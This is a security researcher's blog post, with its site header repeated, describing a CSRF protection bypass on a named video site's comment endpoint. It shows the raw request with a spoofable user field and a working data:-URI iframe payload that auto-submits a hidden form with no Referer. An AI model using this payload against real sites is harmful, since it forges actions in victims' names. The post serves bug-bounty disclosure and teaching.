@zseano
UK Security Researcher
A site containing various blog posts, tutorials, tools and information regarding working with me.
@zseano
UK Security Researcher
A site containing various blog posts, tutorials, tools and information regarding working with me.
CSRF 'protection' bypass on xvideos
Read more blogs on BugBountyForumWhen commenting on a video on xvideos there’s 0 CSRF tokens sent. The request is:
POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1
user=testuser&comment=testy&test=ok
We can actually spoof user= to be whatever want. However.. xvideos check if the Referer: is xvideos.com, or blank. If it’s blank, it’ll let it through.
But how can we send a blank referer? This is where our trusty friend data: comes into play.
If you visit
data:text/html, <script>top.location.href='http://www.google.com/';</script> on chrome, it’ll redirect with no referer and origin as null.
So let’s create an iframe with data: along with our form to submit a post. (replace video_here with videoid below).
<iframe src='data:text/html,<html> <head> <script> function doit() { document.getElementById("myForm").submit(); } setTimeout(doit,2000); </script> </head> <div style="display:none;"> <iframe id="myframe" name="myframe"></iframe> <form id="myForm" name="myForm" action="http://www.xvideos.com/video-post-comment/video_here/" method="POST" target="myframe"> <input type="text" name="user" value="testuser"></input> <input type="text" name="comment" value="testy"></input> <input type="text" name="test" value="ok"></input> </form>'></iframe>
The request:
The response:
Notice thanks to data:, the referer value isn’t there and Origin is “null”, so xvideos let it through. :)